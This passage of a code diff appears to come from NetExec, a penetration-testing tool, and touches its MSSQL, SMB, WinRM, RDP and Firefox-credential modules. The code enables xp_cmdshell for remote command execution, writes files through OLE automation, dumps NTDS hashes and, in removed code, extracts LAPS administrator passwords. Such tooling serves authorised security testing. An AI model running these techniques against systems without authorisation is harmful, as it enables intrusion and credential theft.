self.logger.error(f"Error when attempting to execute command via xp_cmdshell: {e}")
|
||||
|
||||
if output:
|
||||
nxc_logger.debug("Output is enabled")
|
||||
for row in command_output:
|
||||
nxc_logger.debug(row)
|
||||
# if len(self.outputBuffer):
|
||||
try:
|
||||
self.disable_xp_cmdshell()
|
||||
except Exception as e:
|
||||
nxc_logger.error(f"[OPSEC] Error when attempting to disable xp_cmdshell: {e}")
|
||||
return command_output
|
||||
self.logger.error(f"[OPSEC] Error when attempting to disable xp_cmdshell: {e}")
|
||||
|
||||
if output:
|
||||
self.logger.debug(f"SQL Query Result: {result}")
|
||||
for row in result:
|
||||
if row["output"] == "NULL":
|
||||
continue
|
||||
self.outputBuffer.append(row["output"])
|
||||
else:
|
||||
self.logger.info("Output set to disabled")
|
||||
|
||||
return self.outputBuffer
|
||||
|
||||
def enable_xp_cmdshell(self):
|
||||
self.mssql_conn.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
|
||||
|
@ -53,7 +53,7 @@ class MSSQLEXEC:
|
|||
self.mssql_conn.sql_query(f"DECLARE @ob INT;EXEC sp_OACreate 'ADODB.Stream', @ob OUTPUT;EXEC sp_OASetProperty @ob, 'Type', 1;EXEC sp_OAMethod @ob, 'Open';EXEC sp_OAMethod @ob, 'Write', NULL, 0x{hexdata};EXEC sp_OAMethod @ob, 'SaveToFile', NULL, '{remote}', 2;EXEC sp_OAMethod @ob, 'Close';EXEC sp_OADestroy @ob;")
|
||||
self.disable_ole()
|
||||
except Exception as e:
|
||||
nxc_logger.debug(f"Error uploading via mssqlexec: {e}")
|
||||
self.logger.debug(f"Error uploading via mssqlexec: {e}")
|
||||
|
||||
def file_exists(self, remote):
|
||||
try:
|
||||
|
@ -71,4 +71,4 @@ class MSSQLEXEC:
|
|||
f.write(binascii.unhexlify(data))
|
||||
|
||||
except Exception as e:
|
||||
nxc_logger.debug(f"Error downloading via mssqlexec: {e}")
|
||||
self.logger.debug(f"Error downloading via mssqlexec: {e}")
|
||||
|
|
|
@ -1,17 +1,13 @@
|
|||
from argparse import _StoreTrueAction
|
||||
|
||||
|
||||
def proto_args(parser, std_parser, module_parser):
|
||||
mssql_parser = parser.add_parser("mssql", help="own stuff using MSSQL", parents=[std_parser, module_parser])
|
||||
mssql_parser.add_argument("-H", "--hash", metavar="HASH", dest="hash", nargs="+", default=[], help="NTLM hash(es) or file(s) containing NTLM hashes")
|
||||
mssql_parser.add_argument("--port", default=1433, type=int, metavar="PORT", help="MSSQL port (default: 1433)")
|
||||
mssql_parser.add_argument("--mssql-timeout", help="SQL server connection timeout, default is %(default)s seconds", type=int, default=5)
|
||||
mssql_parser.add_argument("-q", "--query", dest="mssql_query", metavar="QUERY", type=str, help="execute the specified query against the MSSQL DB")
|
||||
no_smb_arg = mssql_parser.add_argument("--no-smb", action=get_conditional_action(_StoreTrueAction), make_required=[], help="No smb connection")
|
||||
|
||||
dgroup = mssql_parser.add_mutually_exclusive_group()
|
||||
domain_arg = dgroup.add_argument("-d", metavar="DOMAIN", dest="domain", type=str, help="domain name")
|
||||
dgroup.add_argument("-d", metavar="DOMAIN", dest="domain", type=str, help="domain name")
|
||||
dgroup.add_argument("--local-auth", action="store_true", help="authenticate locally to each target")
|
||||
no_smb_arg.make_required = [domain_arg]
|
||||
|
||||
cgroup = mssql_parser.add_argument_group("Command Execution", "options for executing commands")
|
||||
cgroup.add_argument("--force-ps32", action="store_true", help="force the PowerShell command to run in a 32-bit process")
|
||||
|
@ -25,22 +21,7 @@ def proto_args(parser, std_parser, module_parser):
|
|||
psgroup.add_argument("--clear-obfscripts", action="store_true", help="Clear all cached obfuscated PowerShell scripts")
|
||||
|
||||
tgroup = mssql_parser.add_argument_group("Files", "Options for put and get remote files")
|
||||
tgroup.add_argument("--put-file", nargs=2, metavar="FILE", help="Put a local file into remote target, ex: whoami.txt C:\\Windows\\Temp\\whoami.txt")
|
||||
tgroup.add_argument("--get-file", nargs=2, metavar="FILE", help="Get a remote file, ex: C:\\Windows\\Temp\\whoami.txt whoami.txt")
|
||||
tgroup.add_argument("--put-file", nargs=2, metavar=("SRC_FILE", "DEST_FILE"), help="Put a local file into remote target, ex: whoami.txt C:\\Windows\\Temp\\whoami.txt")
|
||||
tgroup.add_argument("--get-file", nargs=2, metavar=("SRC_FILE", "DEST_FILE"), help="Get a remote file, ex: C:\\Windows\\Temp\\whoami.txt whoami.txt")
|
||||
|
||||
return parser
|
||||
|
||||
|
||||
def get_conditional_action(baseAction):
|
||||
class ConditionalAction(baseAction):
|
||||
def __init__(self, option_strings, dest, **kwargs):
|
||||
x = kwargs.pop("make_required", [])
|
||||
super().__init__(option_strings, dest, **kwargs)
|
||||
self.make_required = x
|
||||
|
||||
def __call__(self, parser, namespace, values, option_string=None):
|
||||
for x in self.make_required:
|
||||
x.required = True
|
||||
super().__call__(parser, namespace, values, option_string)
|
||||
|
||||
return ConditionalAction
|
||||
return parser
|
|
@ -87,6 +87,16 @@ class rdp(connection):
|
|||
# if hasattr(self.args, 'module') and self.args.module:
|
||||
|
||||
def proto_logger(self):
|
||||
import platform
|
||||
if platform.python_version() in ["3.11.5", "3.11.6", "3.12.0"]:
|
||||
import sys
|
||||
|
||||
class DevNull:
|
||||
def write(self, msg):
|
||||
pass
|
||||
|
||||
sys.stderr = DevNull()
|
||||
|
||||
self.logger = NXCAdapter(
|
||||
extra={
|
||||
"protocol": "RDP",
|
||||
|
|
|
@ -1,5 +1,4 @@
|
|||
import ntpath
|
||||
import hashlib
|
||||
import binascii
|
||||
import os
|
||||
import re
|
||||
|
@ -44,7 +43,6 @@ from nxc.protocols.smb.smbspider import SMBSpider
|
|||
from nxc.protocols.smb.passpol import PassPolDump
|
||||
from nxc.protocols.smb.samruser import UserSamrDump
|
||||
from nxc.protocols.smb.samrfunc import SamrFunc
|
||||
from nxc.protocols.ldap.laps import LDAPConnect, LAPSv2Extract
|
||||
from nxc.protocols.ldap.gmsa import MSDS_MANAGEDPASSWORD_BLOB
|
||||
from nxc.helpers.logger import highlight
|
||||
from nxc.helpers.bloodhound import add_user_bh
|
||||
|
@ -65,7 +63,6 @@ from datetime import datetime
|
|||
from functools import wraps
|
||||
from traceback import format_exc
|
||||
import logging
|
||||
from json import loads
|
||||
from termcolor import colored
|
||||
import contextlib
|
||||
|
||||
|
@ -260,104 +257,11 @@ class smb(connection):
|
|||
except Exception as e:
|
||||
self.logger.debug(f"Error logging off system: {e}")
|
||||
|
||||
def laps_search(self, username, password, ntlm_hash, domain):
|
||||
self.logger.extra["protocol"] = "LDAP"
|
||||
self.logger.extra["port"] = "389"
|
||||
|
||||
ldapco = LDAPConnect(self.domain, "389", self.domain)
|
||||
|
||||
if self.kerberos:
|
||||
if self.kdcHost is None:
|
||||
self.logger.fail("Add --kdcHost parameter to use laps with kerberos")
|
||||
return False
|
||||
|
||||
connection = ldapco.kerberos_login(
|
||||
domain,
|
||||
username[0] if username else "",
|
||||
password[0] if password else "",
|
||||
ntlm_hash[0] if ntlm_hash else "",
|
||||
kdcHost=self.kdcHost,
|
||||
aesKey=self.aesKey,
|
||||
)
|
||||
else:
|
||||
connection = ldapco.auth_login(
|
||||
domain,
|
||||
username[0] if username else "",
|
||||
password[0] if password else "",
|
||||
ntlm_hash[0] if ntlm_hash else "",
|
||||
)
|
||||
if not connection:
|
||||
self.logger.fail(f"LDAP connection failed with account {username[0]}")
|
||||
|
||||
return False
|
||||
|
||||
search_filter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" + self.hostname + "))"
|
||||
attributes = [
|
||||
"msLAPS-EncryptedPassword",
|
||||
"msLAPS-Password",
|
||||
"ms-MCS-AdmPwd",
|
||||
"sAMAccountName",
|
||||
]
|
||||
results = connection.search(searchFilter=search_filter, attributes=attributes, sizeLimit=0)
|
||||
|
||||
msMCSAdmPwd = ""
|
||||
sAMAccountName = ""
|
||||
username_laps = ""
|
||||
|
||||
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
||||
|
||||
results = [r for r in results if isinstance(r, ldapasn1_impacket.SearchResultEntry)]
|
||||
if len(results) != 0:
|
||||
for host in results:
|
||||
values = {str(attr["type"]).lower(): attr["vals"][0] for attr in host["attributes"]}
|
||||
if "mslaps-encryptedpassword" in values:
|
||||
msMCSAdmPwd = values["mslaps-encryptedpassword"]
|
||||
d = LAPSv2Extract(bytes(msMCSAdmPwd), username[0] if username else "", password[0] if password else "", domain, ntlm_hash[0] if ntlm_hash else "", self.args.kerberos, self.args.kdcHost, 339)
|
||||
try:
|
||||
data = d.run()
|
||||
except Exception as e:
|
||||
self.logger.fail(str(e))
|
||||
return None
|
||||
r = loads(data)
|
||||
msMCSAdmPwd = r["p"]
|
||||
username_laps = r["n"]
|
||||
elif "mslaps-password" in values:
|
||||
r = loads(str(values["mslaps-password"]))
|
||||
msMCSAdmPwd = r["p"]
|
||||
username_laps = r["n"]
|
||||
elif "ms-mcs-admpwd" in values:
|
||||
msMCSAdmPwd = str(values["ms-mcs-admpwd"])
|
||||
else:
|
||||
self.logger.fail("No result found with attribute ms-MCS-AdmPwd or msLAPS-Password")
|
||||
logging.debug(f"Host: {sAMAccountName:<20} Password: {msMCSAdmPwd} {self.hostname}")
|
||||
else:
|
||||
self.logger.fail(f"msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS property for {self.hostname}")
|
||||
|
||||
return False
|
||||
|
||||
self.username = username_laps if username_laps else self.args.laps
|
||||
self.password = msMCSAdmPwd
|
||||
|
||||
if msMCSAdmPwd == "":
|
||||
self.logger.fail(f"msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS property for {self.hostname}")
|
||||
|
||||
return False
|
||||
if ntlm_hash:
|
||||
hash_ntlm = hashlib.new("md4", msMCSAdmPwd.encode("utf-16le")).digest()
|
||||
self.hash = binascii.hexlify(hash_ntlm).decode()
|
||||
|
||||
self.args.local_auth = True
|
||||
self.domain = self.hostname
|
||||
self.logger.extra["protocol"] = "SMB"
|
||||
self.logger.extra["port"] = "445"
|
||||
return True
|
||||
|
||||
def print_host_info(self):
|
||||
signing = colored(f"signing:{self.signing}", host_info_colors[0], attrs=["bold"]) if self.signing else colored(f"signing:{self.signing}", host_info_colors[1], attrs=["bold"])
|
||||
smbv1 = colored(f"SMBv1:{self.smbv1}", host_info_colors[2], attrs=["bold"]) if self.smbv1 else colored(f"SMBv1:{self.smbv1}", host_info_colors[3], attrs=["bold"])
|
||||
self.logger.display(f"{self.server_os}{f' x{self.os_arch}' if self.os_arch else ''} (name:{self.hostname}) (domain:{self.targetDomain}) ({signing}) ({smbv1})")
|
||||
if self.args.laps:
|
||||
return self.laps_search(self.args.username, self.args.password, self.args.hash, self.domain)
|
||||
return True
|
||||
|
||||
def kerberos_login(self, domain, username, password="", ntlm_hash="", aesKey="", kdcHost="", useCache=False):
|
||||
|
@ -370,49 +274,45 @@ class smb(connection):
|
|||
nthash = ""
|
||||
|
||||
try:
|
||||
if not self.args.laps:
|
||||
self.password = password
|
||||
self.username = username
|
||||
# This checks to see if we didn't provide the LM Hash
|
||||
if ntlm_hash.find(":") != -1:
|
||||
lmhash, nthash = ntlm_hash.split(":")
|
||||
self.hash = nthash
|
||||
else:
|
||||
nthash = ntlm_hash
|
||||
self.hash = ntlm_hash
|
||||
if lmhash:
|
||||
self.lmhash = lmhash
|
||||
if nthash:
|
||||
self.nthash = nthash
|
||||
|
||||
if not all(s == "" for s in [self.nthash, password, aesKey]):
|
||||
kerb_pass = next(s for s in [self.nthash, password, aesKey] if s)
|
||||
else:
|
||||
kerb_pass = ""
|
||||
self.logger.debug(f"Attempting to do Kerberos Login with useCache: {useCache}")
|
||||
|
||||
tgs = None
|
||||
if self.args.delegate:
|
||||
kerb_pass = ""
|
||||
self.username = self.args.delegate
|
||||
serverName = Principal(f"cifs/{self.hostname}", type=constants.PrincipalNameType.NT_SRV_INST.value)
|
||||
tgs = kerberos_login_with_S4U(domain, self.hostname, username, password, nthash, lmhash, aesKey, kdcHost, self.args.delegate, serverName, useCache, no_s4u2proxy=self.args.no_s4u2proxy)
|
||||
self.logger.debug(f"Got TGS for {self.args.delegate} through S4U")
|
||||
|
||||
self.conn.kerberosLogin(self.username, password, domain, lmhash, nthash, aesKey, kdcHost, useCache=useCache, TGS=tgs)
|
||||
self.check_if_admin()
|
||||
|
||||
if username == "":
|
||||
self.username = self.conn.getCredentials()[0]
|
||||
elif not self.args.delegate:
|
||||
self.username = username
|
||||
|
||||
used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}"
|
||||
if self.args.delegate:
|
||||
used_ccache = f" through S4U with {username}"
|
||||
self.password = password
|
||||
self.username = username
|
||||
# This checks to see if we didn't provide the LM Hash
|
||||
if ntlm_hash.find(":") != -1:
|
||||
lmhash, nthash = ntlm_hash.split(":")
|
||||
self.hash = nthash
|
||||
else:
|
||||
self.plaintext_login(self.hostname, username, password)
|
||||
return True
|
||||
nthash = ntlm_hash
|
||||
self.hash = ntlm_hash
|
||||
if lmhash:
|
||||
self.lmhash = lmhash
|
||||
if nthash:
|
||||
self.nthash = nthash
|
||||
|
||||
if not all(s == "" for s in [self.nthash, password, aesKey]):
|
||||
kerb_pass = next(s for s in [self.nthash, password, aesKey] if s)
|
||||
else:
|
||||
kerb_pass = ""
|
||||
self.logger.debug(f"Attempting to do Kerberos Login with useCache: {useCache}")
|
||||
|
||||
tgs = None
|
||||
if self.args.delegate:
|
||||
kerb_pass = ""
|
||||
self.username = self.args.delegate
|
||||
serverName = Principal(f"cifs/{self.hostname}", type=constants.PrincipalNameType.NT_SRV_INST.value)
|
||||
tgs = kerberos_login_with_S4U(domain, self.hostname, username, password, nthash, lmhash, aesKey, kdcHost, self.args.delegate, serverName, useCache, no_s4u2proxy=self.args.no_s4u2proxy)
|
||||
self.logger.debug(f"Got TGS for {self.args.delegate} through S4U")
|
||||
|
||||
self.conn.kerberosLogin(self.username, password, domain, lmhash, nthash, aesKey, kdcHost, useCache=useCache, TGS=tgs)
|
||||
self.check_if_admin()
|
||||
|
||||
if username == "":
|
||||
self.username = self.conn.getCredentials()[0]
|
||||
elif not self.args.delegate:
|
||||
self.username = username
|
||||
|
||||
used_ccache = " from ccache" if useCache else f":{process_secret(kerb_pass)}"
|
||||
if self.args.delegate:
|
||||
used_ccache = f" through S4U with {username}"
|
||||
|
||||
out = f"{self.domain}\\{self.username}{used_ccache} {self.mark_pwned()}"
|
||||
self.logger.success(out)
|
||||
|
@ -463,17 +363,11 @@ class smb(connection):
|
|||
# Re-connect since we logged off
|
||||
self.create_conn_obj()
|
||||
try:
|
||||
if not self.args.laps:
|
||||
self.password = password
|
||||
self.username = username
|
||||
self.password = password
|
||||
self.username = username
|
||||
self.domain = domain
|
||||
|
||||
try:
|
||||
self.conn.login(self.username, self.password, domain)
|
||||
except UnicodeEncodeError:
|
||||
self.logger.error(f"UnicodeEncodeError on: '{self.username}:{self.password}'. Trying again with a different encoding...")
|
||||
self.create_conn_obj()
|
||||
self.conn.login(self.username, self.password.encode().decode("latin-1"), domain)
|
||||
self.conn.login(self.username, self.password, domain)
|
||||
|
||||
self.check_if_admin()
|
||||
self.logger.debug(f"Adding credential: {domain}/{self.username}:{self.password}")
|
||||
|
@ -528,23 +422,19 @@ class smb(connection):
|
|||
lmhash = ""
|
||||
nthash = ""
|
||||
try:
|
||||
if not self.args.laps:
|
||||
self.username = username
|
||||
# This checks to see if we didn't provide the LM Hash
|
||||
if ntlm_hash.find(":") != -1:
|
||||
lmhash, nthash = ntlm_hash.split(":")
|
||||
self.hash = nthash
|
||||
else:
|
||||
nthash = ntlm_hash
|
||||
self.hash = ntlm_hash
|
||||
if lmhash:
|
||||
self.lmhash = lmhash
|
||||
if nthash:
|
||||
self.nthash = nthash
|
||||
else:
|
||||
nthash = self.hash
|
||||
|
||||
self.domain = domain
|
||||
self.username = username
|
||||
# This checks to see if we didn't provide the LM Hash
|
||||
if ntlm_hash.find(":") != -1:
|
||||
lmhash, nthash = ntlm_hash.split(":")
|
||||
self.hash = nthash
|
||||
else:
|
||||
nthash = ntlm_hash
|
||||
self.hash = ntlm_hash
|
||||
if lmhash:
|
||||
self.lmhash = lmhash
|
||||
if nthash:
|
||||
self.nthash = nthash
|
||||
|
||||
self.conn.login(self.username, "", domain, lmhash, nthash)
|
||||
|
||||
|
@ -854,17 +744,23 @@ class smb(connection):
|
|||
share_info["access"].append("READ")
|
||||
except SessionError as e:
|
||||
error = get_error_string(e)
|
||||
self.logger.debug(f"Error checking READ access on share: {error}")
|
||||
self.logger.debug(f"Error checking READ access on share {share_name}: {error}")
|
||||
|
||||
if not self.args.no_write_check:
|
||||
try:
|
||||
self.conn.createDirectory(share_name, temp_dir)
|
||||
self.conn.deleteDirectory(share_name, temp_dir)
|
||||
write = True
|
||||
share_info["access"].append("WRITE")
|
||||
except SessionError as e:
|
||||
error = get_error_string(e)
|
||||
self.logger.debug(f"Error checking WRITE access on share: {error}")
|
||||
self.logger.debug(f"Error checking WRITE access on share {share_name}: {error}")
|
||||
|
||||
if write:
|
||||
try:
|
||||
self.conn.deleteDirectory(share_name, temp_dir)
|
||||
except SessionError as e:
|
||||
error = get_error_string(e)
|
||||
self.logger.debug(f"Error DELETING created temp dir {temp_dir} on share {share_name}: {error}")
|
||||
|
||||
permissions.append(share_info)
|
||||
|
||||
|
@ -1376,12 +1272,11 @@ class smb(connection):
|
|||
os.remove(download_path)
|
||||
|
||||
def enable_remoteops(self):
|
||||
if self.remote_ops is not None and self.bootkey is not None:
|
||||
return
|
||||
try:
|
||||
self.remote_ops = RemoteOperations(self.conn, self.kerberos, self.kdcHost)
|
||||
self.remote_ops.enableRegistry()
|
||||
self.bootkey = self.remote_ops.getBootKey()
|
||||
if self.bootkey is None:
|
||||
self.bootkey = self.remote_ops.getBootKey()
|
||||
except Exception as e:
|
||||
self.logger.fail(f"RemoteOperations failed: {e}")
|
||||
|
||||
|
@ -1697,10 +1592,10 @@ class smb(connection):
|
|||
add_ntds_hash.ntds_hashes += 1
|
||||
if self.args.enabled:
|
||||
if "Enabled" in ntds_hash:
|
||||
ntds_hash = ntds_hash.split(" ")[0]
|
||||
ntds_hash = " ".join(ntds_hash.split(" ")[:-1])
|
||||
self.logger.highlight(ntds_hash)
|
||||
else:
|
||||
ntds_hash = ntds_hash.split(" ")[0]
|
||||
ntds_hash = " ".join(ntds_hash.split(" ")[:-1])
|
||||
self.logger.highlight(ntds_hash)
|
||||
if ntds_hash.find("$") == -1:
|
||||
if ntds_hash.find("\\") != -1:
|
||||
|
|
|
@ -4,6 +4,7 @@ from hashlib import pbkdf2_hmac, sha1
|
|||
import hmac
|
||||
import json
|
||||
import ntpath
|
||||
from os import remove
|
||||
import sqlite3
|
||||
import tempfile
|
||||
from Cryptodome.Cipher import AES, DES3
|
||||
|
@ -121,7 +122,10 @@ class FirefoxTriage:
|
|||
]
|
||||
|
||||
def get_key(self, key4_data, master_password=b""):
|
||||
fh = tempfile.NamedTemporaryFile()
|
||||
# Instead of disabling "delete" and removing the file manually,
|
||||
# in the future (py3.12) we could use "delete_on_close=False" as a cleaner solution
|
||||
# Related issue: #134
|
||||
fh = tempfile.NamedTemporaryFile(delete=False)
|
||||
fh.write(key4_data)
|
||||
fh.seek(0)
|
||||
db = sqlite3.connect(fh.name)
|
||||
|
@ -149,7 +153,12 @@ class FirefoxTriage:
|
|||
self.logger.debug(e)
|
||||
fh.close()
|
||||
return b""
|
||||
db.close()
|
||||
fh.close()
|
||||
try:
|
||||
remove(fh.name)
|
||||
except Exception as e:
|
||||
self.logger.error(f"Error removing temporary file: {e}")
|
||||
|
||||
def is_master_password_correct(self, key_data, master_password=b""):
|
||||
try:
|
||||
|
|
|
@ -115,7 +115,7 @@ class SAMRQuery:
|
|||
self.server_handle = self.get_server_handle()
|
||||
|
||||
def get_transport(self):
|
||||
string_binding = f"ncacn_np:{self.__port}[\pipe\samr]"
|
||||
string_binding = rf"ncacn_np:{self.__port}[\pipe\samr]"
|
||||
nxc_logger.debug(f"Binding to {string_binding}")
|
||||
# using a direct SMBTransport instead of DCERPCTransportFactory since we need the filename to be '\samr'
|
||||
return transport.SMBTransport(
|
||||
|
|
|
@ -1,9 +1,7 @@
|
|||
import binascii
|
||||
import hashlib
|
||||
import os
|
||||
import base64
|
||||
import requests
|
||||
import urllib3
|
||||
import contextlib
|
||||
import logging
|
||||
import xml.etree.ElementTree as ET
|
||||
|
||||
|
@ -12,19 +10,19 @@ from datetime import datetime
|
|||
from pypsrp.wsman import NAMESPACES
|
||||
from pypsrp.client import Client
|
||||
|
||||
from impacket.smbconnection import SMBConnection
|
||||
from impacket.examples.secretsdump import LocalOperations, LSASecrets, SAMHashes
|
||||
|
||||
from nxc.config import process_secret
|
||||
from nxc.connection import connection
|
||||
from nxc.helpers.bloodhound import add_user_bh
|
||||
from nxc.helpers.misc import gen_random_string
|
||||
from nxc.protocols.ldap.laps import LDAPConnect, LAPSv2Extract
|
||||
from nxc.helpers.ntlm_parser import parse_challenge
|
||||
from nxc.logger import NXCAdapter
|
||||
|
||||
|
||||
urllib3.disable_warnings()
|
||||
|
||||
|
||||
class winrm(connection):
|
||||
def __init__(self, args, db, host):
|
||||
self.domain = None
|
||||
|
@ -35,167 +33,50 @@ class winrm(connection):
|
|||
self.lmhash = ""
|
||||
self.nthash = ""
|
||||
self.ssl = False
|
||||
self.auth_type = None
|
||||
self.challenge_header = None
|
||||
|
||||
connection.__init__(self, args, db, host)
|
||||
|
||||
def proto_logger(self):
|
||||
# Reason why default is SMB/445, because default is enumerate over SMB.
|
||||
# For more details, please check the function "print_host_info"
|
||||
# For more details, please check the function "print_host_info"
|
||||
logging.getLogger("pypsrp").disabled = True
|
||||
logging.getLogger("pypsrp.wsman").disabled = True
|
||||
self.logger = NXCAdapter(
|
||||
extra={
|
||||
"protocol": "SMB",
|
||||
"protocol": "WINRM",
|
||||
"host": self.host,
|
||||
"port": "445",
|
||||
"port": "5985",
|
||||
"hostname": self.hostname,
|
||||
}
|
||||
)
|
||||
|
||||
def enum_host_info(self):
|
||||
# smb no open, specify the domain
|
||||
if self.args.no_smb:
|
||||
self.domain = self.args.domain
|
||||
else:
|
||||
try:
|
||||
smb_conn = SMBConnection(self.host, self.host, None, timeout=5)
|
||||
no_ntlm = False
|
||||
except Exception as e:
|
||||
self.logger.fail(f"Error retrieving host domain: {e} specify one manually with the '-d' flag")
|
||||
else:
|
||||
try:
|
||||
smb_conn.login("", "")
|
||||
except BrokenPipeError:
|
||||
self.logger.fail("Broken Pipe Error while attempting to login")
|
||||
except Exception as e:
|
||||
if "STATUS_NOT_SUPPORTED" in str(e):
|
||||
# no ntlm supported
|
||||
no_ntlm = True
|
||||
ntlm_info = parse_challenge(base64.b64decode(self.challenge_header.split(" ")[1].replace(",", "")))
|
||||
self.domain = ntlm_info["domain"]
|
||||
self.hostname = ntlm_info["hostname"]
|
||||
self.server_os = ntlm_info["os_version"]
|
||||
self.logger.extra["hostname"] = self.hostname
|
||||
|
||||
self.domain = smb_conn.getServerDNSDomainName() if not no_ntlm else self.args.domain
|
||||
self.hostname = smb_conn.getServerName() if not no_ntlm else self.host
|
||||
self.server_os = smb_conn.getServerOS()
|
||||
if isinstance(self.server_os.lower(), bytes):
|
||||
self.server_os = self.server_os.decode("utf-8")
|
||||
self.output_filename = os.path.expanduser(f"~/.nxc/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}")
|
||||
|
||||
self.logger.extra["hostname"] = self.hostname
|
||||
|
||||
self.output_filename = os.path.expanduser(f"~/.nxc/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}")
|
||||
|
||||
with contextlib.suppress(Exception):
|
||||
smb_conn.logoff()
|
||||
|
||||
self.db.add_host(self.host, self.port, self.hostname, self.domain, self.server_os)
|
||||
self.db.add_host(self.host, self.port, self.hostname, self.domain, self.server_os)
|
||||
|
||||
if self.args.domain:
|
||||
self.domain = self.args.domain
|
||||
|
||||
if self.args.local_auth:
|
||||
self.domain = self.hostname
|
||||
|
||||
|
||||
if self.domain is None:
|
||||
self.domain = ""
|
||||
|
||||
|
||||
self.output_filename = os.path.expanduser(f"~/.nxc/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}".replace(":", "-"))
|
||||
|
||||
def laps_search(self, username, password, ntlm_hash, domain):
|
||||
ldapco = LDAPConnect(self.domain, "389", self.domain)
|
||||
|
||||
if self.kerberos:
|
||||
if self.kdcHost is None:
|
||||
self.logger.fail("Add --kdcHost parameter to use laps with kerberos")
|
||||
return False
|
||||
|
||||
connection = ldapco.kerberos_login(
|
||||
domain,
|
||||
username[0] if username else "",
|
||||
password[0] if password else "",
|
||||
ntlm_hash[0] if ntlm_hash else "",
|
||||
kdcHost=self.kdcHost,
|
||||
aesKey=self.aesKey,
|
||||
)
|
||||
else:
|
||||
connection = ldapco.auth_login(
|
||||
domain,
|
||||
username[0] if username else "",
|
||||
password[0] if password else "",
|
||||
ntlm_hash[0] if ntlm_hash else "",
|
||||
)
|
||||
if not connection:
|
||||
self.logger.fail(f"LDAP connection failed with account {username[0]}")
|
||||
return False
|
||||
|
||||
search_filter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" + self.hostname + "))"
|
||||
attributes = [
|
||||
"msLAPS-EncryptedPassword",
|
||||
"msLAPS-Password",
|
||||
"ms-MCS-AdmPwd",
|
||||
"sAMAccountName",
|
||||
]
|
||||
results = connection.search(searchFilter=search_filter, attributes=attributes, sizeLimit=0)
|
||||
|
||||
msMCSAdmPwd = ""
|
||||
sAMAccountName = ""
|
||||
username_laps = ""
|
||||
|
||||
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
||||
|
||||
results = [r for r in results if isinstance(r, ldapasn1_impacket.SearchResultEntry)]
|
||||
if len(results) != 0:
|
||||
for host in results:
|
||||
values = {str(attr["type"]).lower(): attr["vals"][0] for attr in host["attributes"]}
|
||||
if "mslaps-encryptedpassword" in values:
|
||||
from json import loads
|
||||
|
||||
msMCSAdmPwd = values["mslaps-encryptedpassword"]
|
||||
d = LAPSv2Extract(bytes(msMCSAdmPwd), username[0] if username else "", password[0] if password else "", domain, ntlm_hash[0] if ntlm_hash else "", self.args.kerberos, self.args.kdcHost, 339)
|
||||
data = d.run()
|
||||
r = loads(data)
|
||||
msMCSAdmPwd = r["p"]
|
||||
username_laps = r["n"]
|
||||
elif "mslaps-password" in values:
|
||||
from json import loads
|
||||
|
||||
r = loads(str(values["mslaps-password"]))
|
||||
msMCSAdmPwd = r["p"]
|
||||
username_laps = r["n"]
|
||||
elif "ms-mcs-admpwd" in values:
|
||||
msMCSAdmPwd = str(values["ms-mcs-admpwd"])
|
||||
else:
|
||||
self.logger.fail("No result found with attribute ms-MCS-AdmPwd or msLAPS-Password")
|
||||
self.logger.debug(f"Host: {sAMAccountName:<20} Password: {msMCSAdmPwd} {self.hostname}")
|
||||
else:
|
||||
self.logger.fail(f"msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS property for {self.hostname}")
|
||||
return False
|
||||
|
||||
self.username = username_laps if username_laps else self.args.laps
|
||||
self.password = msMCSAdmPwd
|
||||
|
||||
if msMCSAdmPwd == "":
|
||||
self.logger.fail(f"msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS property for {self.hostname}")
|
||||
return False
|
||||
if ntlm_hash:
|
||||
hash_ntlm = hashlib.new("md4", msMCSAdmPwd.encode("utf-16le")).digest()
|
||||
self.hash = binascii.hexlify(hash_ntlm).decode()
|
||||
|
||||
self.domain = self.hostname
|
||||
return True
|
||||
|
||||
def print_host_info(self):
|
||||
if self.args.no_smb:
|
||||
self.logger.extra["protocol"] = "WINRM-SSL" if self.ssl else "WINRM"
|
||||
self.logger.extra["port"] = self.port
|
||||
self.logger.display(f"{self.server_os} (name:{self.hostname}) (domain:{self.domain})")
|
||||
else:
|
||||
self.logger.display(f"{self.server_os} (name:{self.hostname}) (domain:{self.domain})")
|
||||
self.logger.extra["protocol"] = "WINRM-SSL" if self.ssl else "WINRM"
|
||||
self.logger.extra["port"] = self.port
|
||||
|
||||
self.logger.info(f"Connection information: {self.endpoint} (auth type:{self.auth_type}) (domain:{self.domain if self.args.domain else ''})")
|
||||
self.logger.extra["protocol"] = "WINRM-SSL" if self.ssl else "WINRM"
|
||||
self.logger.extra["port"] = self.port
|
||||
self.logger.display(f"{self.server_os} (name:{self.hostname}) (domain:{self.domain})")
|
||||
|
||||
if self.args.laps:
|
||||
return self.laps_search(self.args.username, self.args.password, self.args.hash, self.domain)
|
||||
return True
|
||||
|
||||
def create_conn_obj(self):
|
||||
|
@ -205,6 +86,14 @@ class winrm(connection):
|
|||
|
||||
endpoints = {}
|
||||
|
||||
headers = {
|
||||
"Content-Length": "0",
|
||||
"Keep-Alive": "true",
|
||||
"Content-Type": "application/soap+xml;charset=UTF-8",
|
||||
"User-Agent": "Microsoft WinRM Client",
|
||||
"Authorization": "Negotiate TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw=="
|
||||
}
|
||||
|
||||
for protocol in self.args.check_proto:
|
||||
endpoints[protocol] = {}
|
||||
endpoints[protocol]["port"] = self.port[self.args.check_proto.index(protocol)] if len(self.port) == 2 else self.port[0]
|
||||
|
@ -219,9 +108,12 @@ class winrm(connection):
|
|||
self.port = endpoints[protocol]["port"]
|
||||
try:
|
||||
